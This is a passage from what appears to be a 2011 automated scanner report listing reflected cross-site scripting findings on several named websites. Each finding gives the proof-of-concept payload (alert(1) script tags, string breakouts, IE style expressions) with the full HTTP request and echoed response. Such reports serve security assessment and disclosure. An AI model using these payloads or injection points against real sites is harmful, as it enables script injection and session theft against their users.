Confidence:   Certain
Host:   http://nanpa.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd47a<script>alert(1)</script>0e5c60d2086 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocd47a<script>alert(1)</script>0e5c60d2086 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:35 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/favicon.icocd47a<script>alert(1)</script>0e5c60d2086</span>
...[SNIP]...

3.10. http://nanpa.org/history.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /history.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd331<script>alert(1)</script>6930481ebe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history.phpfd331<script>alert(1)</script>6930481ebe4 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/history.phpfd331<script>alert(1)</script>6930481ebe4</span>
...[SNIP]...

3.11. http://nanpa.org/recent_forum_posts.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /recent_forum_posts.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9a60<script>alert(1)</script>dec3bb51a6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /recent_forum_posts.phpd9a60<script>alert(1)</script>dec3bb51a6f HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:03:56 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/recent_forum_posts.phpd9a60<script>alert(1)</script>dec3bb51a6f</span>
...[SNIP]...

3.12. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_all_with_teaser/heds.js

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload b47cc<script>alert(1)</script>8e664057342 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_all_with_teaser/heds.js?count=5b47cc<script>alert(1)</script>8e664057342&pool=5 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:44 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 10
Content-Length: 189
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_all_with_teaser</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 5b47cc<script>alert(1)</script>8e664057342

</body>
</html>


3.13. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [pool parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_all_with_teaser/heds.js

Issue detail

The value of the pool request parameter is copied into the HTML document as plain text between tags. The payload d94a5<script>alert(1)</script>24642529fa1 was submitted in the pool parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_all_with_teaser/heds.js?count=5&pool=5d94a5<script>alert(1)</script>24642529fa1 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:47 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 15
Content-Length: 189
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_all_with_teaser</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 5d94a5<script>alert(1)</script>24642529fa1

</body>
</html>


3.14. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_bss_oss/heds.js

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload 256ed<script>alert(1)</script>e87fa36bb99 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_bss_oss/heds.js?count=2256ed<script>alert(1)</script>e87fa36bb99&pool=2 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:15 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 10
Content-Length: 181
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_bss_oss</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 2256ed<script>alert(1)</script>e87fa36bb99

</body>
</html>


3.15. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [pool parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_bss_oss/heds.js

Issue detail

The value of the pool request parameter is copied into the HTML document as plain text between tags. The payload cd33e<script>alert(1)</script>c1014f2447a was submitted in the pool parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_bss_oss/heds.js?count=2&pool=2cd33e<script>alert(1)</script>c1014f2447a HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:18 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 15
Content-Length: 181
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_bss_oss</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 2cd33e<script>alert(1)</script>c1014f2447a

</body>
</html>


3.16. http://www.911enable.com/business/contact_specialist.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02b2"style%3d"x%3aexpression(alert(1))"23c70c3c464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f02b2"style="x:expression(alert(1))"23c70c3c464 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/contact_specialist.php?provenance=e/f02b2"style%3d"x%3aexpression(alert(1))"23c70c3c464mpty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=p5lqitlmc9snsm73suv3mulrv4; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:31 GMT
Content-Length: 23821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<form name="informationRequest_frm" action="./contact_specialist.php?provenance=e/f02b2"style="x:expression(alert(1))"23c70c3c464mpty" method="POST">
...[SNIP]...

3.17. http://www.911enable.com/business/contact_specialist.php [provenance parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The value of the provenance request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907f1"style%3d"x%3aexpression(alert(1))"092838a3115 was submitted in the provenance parameter. This input was echoed as 907f1"style="x:expression(alert(1))"092838a3115 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/contact_specialist.php?provenance=empty907f1"style%3d"x%3aexpression(alert(1))"092838a3115 HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=tc1hn7igi104t6cg6nldeki6u4; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:18 GMT
Content-Length: 23818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<form name="informationRequest_frm" action="./contact_specialist.php?provenance=empty907f1"style="x:expression(alert(1))"092838a3115" method="POST">
...[SNIP]...

3.18. http://www.commpartnersconnect.com/company [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.commpartnersconnect.com
Path:   /company

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81d1e<script>alert(1)</script>801ba3b362c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /company81d1e<script>alert(1)</script>801ba3b362c?number=&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:51:57 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=a5e17a7f9d60bb5543670f51e71d4278; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 360
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /company81d1e<script>alert(1)</script>801ba3b362c was not found on this server.<P>
...[SNIP]...

3.19. http://www.commpartnersconnect.com/company [number parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.commpartnersconnect.com
Path:   /company

Issue detail

The value of the number request parameter is copied into the HTML document as plain text between tags. The payload bffcd<script>alert(1)</script>94923c6e023 was submitted in the number parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /company?number=bffcd<script>alert(1)</script>94923c6e023&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:50:40 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=545eb0d341bd56039888049293fbe63b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 173
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305161150243({"body": "<p class=bodycopy01>Phone Number: <b>bffcd<script>alert(1)</script>94923c6e023</b><br>Is not currently in our coverage area.<br><p>&nbsp;</p>"})

3.20. http://www.commpartnersconnect.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.commpartnersconnect.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0927<script>alert(1)</script>e987f03bb37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob0927<script>alert(1)</script>e987f03bb37 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a5e17a7f9d60bb5543670f51e71d4278

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:52:57 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icob0927<script>alert(1)</script>e987f03bb37 was not found on this server.<P>
...[SNIP]...

3.21. http://www.etalkup.com/formjsforoneutf8.aspx [workgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.etalkup.com
Path:   /formjsforoneutf8.aspx

Issue detail

The value of the workgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe6a"%3balert(1)//cddffea3e9e was submitted in the workgroup parameter. This input was echoed as 3fe6a";alert(1)//cddffea3e9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com3fe6a"%3balert(1)//cddffea3e9e HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:06:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ptrascvqezc34x45yzfao13h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 510


var kilo_boat_logo="";
var imgChange="";
var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
if(typeof(panelSDK)=="undefined")
{
document.write(
...[SNIP]...
<script type='text/javascript' charset='utf-8' src='"+gaJsProtocol+"www.etalkup.com/getpanelsdk.aspx?workgroup=redsky_wg@workgroup.etalkup.com3fe6a";alert(1)//cddffea3e9e'>
...[SNIP]...

3.22. http://www.etalkup.com/getpanelsdk.aspx [workgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.etalkup.com
Path:   /getpanelsdk.aspx

Issue detail

The value of the workgroup request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcb45'%3balert(1)//97c18dc0ee9 was submitted in the workgroup parameter. This input was echoed as bcb45';alert(1)//97c18dc0ee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getpanelsdk.aspx?workgroup=redsky_wg@workgroup.etalkup.combcb45'%3balert(1)//97c18dc0ee9 HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/
Cookie: ASP.NET_SessionId=pa4hprvrpnb4lnibphzigs45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:07:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7963


var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
var kiloboaturl=gaJsProtocol+"www.etalkup.com/images/";
var kilo_boat_globalUrl=gaJsProtocol+"www.etalk
...[SNIP]...
89";
var directWebchatUrl="http://www.etalkup.com:8087";
var kilo_boat_website=gaJsProtocol+"www.etalkup.com";
var kilo_boat_listpersons="";
var kilo_boat_workgroup='redsky_wg@workgroup.etalkup.combcb45';alert(1)//97c18dc0ee9';
var kilo_boat_domain='etalkup.com';
var company="";
var kilo_boat_agentlist="";
var kilo_boat_automation=1==1?"true":"false";
var kilo_boat_InvitationMsg = ""
var kilo_boat_ComfirmJs="";
var
...[SNIP]...

3.23. http://www.nanpa.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b03c8<script>alert(1)</script>1df8e9a6163 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob03c8<script>alert(1)</script>1df8e9a6163 HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:14:12 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/favicon.icob03c8<script>alert(1)</script>1df8e9a6163</span>
...[SNIP]...

3.24. http://www.nanpa.org/forums/external.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3871<script>alert(1)</script>d19da0837d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forumsa3871<script>alert(1)</script>d19da0837d8/external.php?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/forumsa3871<script>alert(1)</script>d19da0837d8/external.php</span>
...[SNIP]...

3.25. http://www.nanpa.org/forums/external.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2cef<script>alert(1)</script>253b7e5f1c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/external.phpe2cef<script>alert(1)</script>253b7e5f1c8?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:13 GMT
